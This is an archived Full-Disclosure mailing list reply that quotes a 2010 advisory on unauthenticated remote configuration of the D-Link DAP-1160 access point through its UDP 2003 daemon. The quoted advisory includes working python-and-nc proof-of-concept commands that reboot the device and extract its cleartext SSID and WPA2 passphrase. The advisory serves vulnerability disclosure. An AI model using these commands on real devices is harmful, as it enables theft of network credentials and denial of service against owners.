lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Mon, 28 Jun 2010 17:28:33 +0200 From: Cristofaro Mune <pulsoid@...silence.org> To: Gary Baribault <gary@...ibault.net> Cc: full-disclosure@...ts.grok.org.uk Subject: Re: IS-2010-004 - D-Link DAP-1160 Unauthenticated Remote Configuration Being the D-Link DAP-1160 an Access Point and not a router it does not have a specific WAN interface. Nonetheless, the UDP 2003 port is open and reachable from all the available interfaces on this device. Best Regards, Cristofaro Mune Gary Baribault wrote: > Is that UDP 2003 open on the WAN interface as well? > > Gary Baribault > > > On 06/28/2010 09:50 AM, Cristofaro Mune wrote: > > Security Advisory > > > > > > > > > > IS-2010-004 - D-Link DAP-1160 Unauthenticated Remote > > Configuration > > > > > > > > > > > > > > > > > > > > Advisory Information > > > > > -------------------- > > > > > Published: > > > > > 2010-06-28 > > > > > > > > > > Updated: > > > > > 2010-06-28 > > > > > > > > > > Manufacturer: D-Link > > > > > Model: DAP-1160 > > > > > Firmware version: 1.20b06 > > > > > 1.30b10 > > > > > 1.31b01 > > > > > > > > > > > > > > > > > > > > Vulnerability Details > > > > > --------------------- > > > > > > > > > > Public References: > > > > > Not Assigned > > > > > > > > > > > > > > > Platform: > > > > > Successfully tested on D-Link DAP-1160 loaded with firmware > > versions: > > > > > v120b06, v130b10, v131b01. > > > > > Other models and/or firmware versions may be also affected. > > > > > Note: Only firmware version major numbers are displayed on the > > > > > administration web interface: 1.20, 1.30, 1.31 > > > > > > > > > > > > > > > Background Information: > > > > > D-Link DAP-1160 is a wireless access points that allow wireless > > clients > > > > > connectivity to wired networks. > > > > > Supported 802.11b and 802.11g protocols. WEP, WPA and WPA2 > > supported. > > > > > > > > > > > > > > > Summary: > > > > > Unauthenticated access and modification of several device > > parameters, > > > > > including Wi-Fi SSID, keys and passphrases is possible. > > > > > Unauthenticated remote reboot of the device can be also > > performed. > > > > > > > > > > > > > > > Details: > > > > > DCCD is an UDP daemon that listens on port UDP 2003 of the > > device, that > > > > > is likely used for easy device configuration via the DCC (D-Link > > Click > > > > > 'n Connect) protocol. > > > > > By sending properly formatted UDP datagrams to dccd daemon it is > > > > > possible to perform security relevant operation without any > > previous > > > > > authentication. > > > > > It is possible to remotely retrieve sensitive wireless > > configuration > > > > > parameters, such as Wi-Fi SSID, Encryption types, keys and > > passphrases, > > > > > along with other additional information. > > > > > It is also possible to remotely modify such parameters and > > configure the > > > > > device without any knowledge of the web administration password. > > > > > Remote reboot is another operation that an attacker may perform > > in an > > > > > unauthenticated way, possibly triggering a Denial-of-Service > > condition. > > > > > > > > > > > > > > > POC: > > > > > - Remote reboot > > > > > python -c 'print "\x05" + "\x00" * 7' | nc -u <IP_ADDR> > > 2003 > > > > > > > > > > - Retrieving Wi-Fi SSID > > > > > python -c 'print "\x03" + "\x00" * 7 + "\x21\x27\x00"' | nc -o > > ssid.txt > > > > > -u <IP_ADDR> 2003 > > > > > cat ssid.txt (cleartext SSID displayed after "21 27 xx xx" in the > > > > > received datagram) > > > > > > > > > > - Retrieving WPA2 PSK > > > > > python -c 'print "\x03" + "\x00" * 7 + > > "\x23\x27\x00\x00\x24\x27\x00"' | > > > > > nc -u -o pass.txt <IP_ADDR> 2003 > > > > > cat pass.txt (cleartext WPA2 PSK displayed after "24 27 xx xx" > > in the > > > > > received datagram) > > > > > > > > > > > > > > > Impacts: > > > > > Remote extraction of sensitive information > > > > > Modification of existing device configuration > > > > > POssible Denial-of-Service > > > > > > > > > > > > > > > Solutions & Workaround: > > > > > Not available > > > > > > > > > > > > > > > > > > > > Additional Information > > > > > ---------------------- > > > > > Timeline (dd/mm/yy): > > > > > 17/02/2010: Vulnerability discovered > > > > > 17/02/2010: No suitable technical/security contact on > > Global/Regional > > > > > website. No contact available on OSVDB website > > > > > 18/02/2010: Point of contact requested to customer service > > > > > ----------- No response ----------- > > > > > 26/05/2010: Partial disclosure at CONFidence 2010 > > > > > 28/06/2010: This advisory > > > > > > > > > > > > > > > Additional information available at http://www.icysilence.org > > > > > > > > > > _______________________________________________ > > > > > Full-Disclosure - We believe in it. > > > > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > > > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > > > > ------------------------------------------------------------------------ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists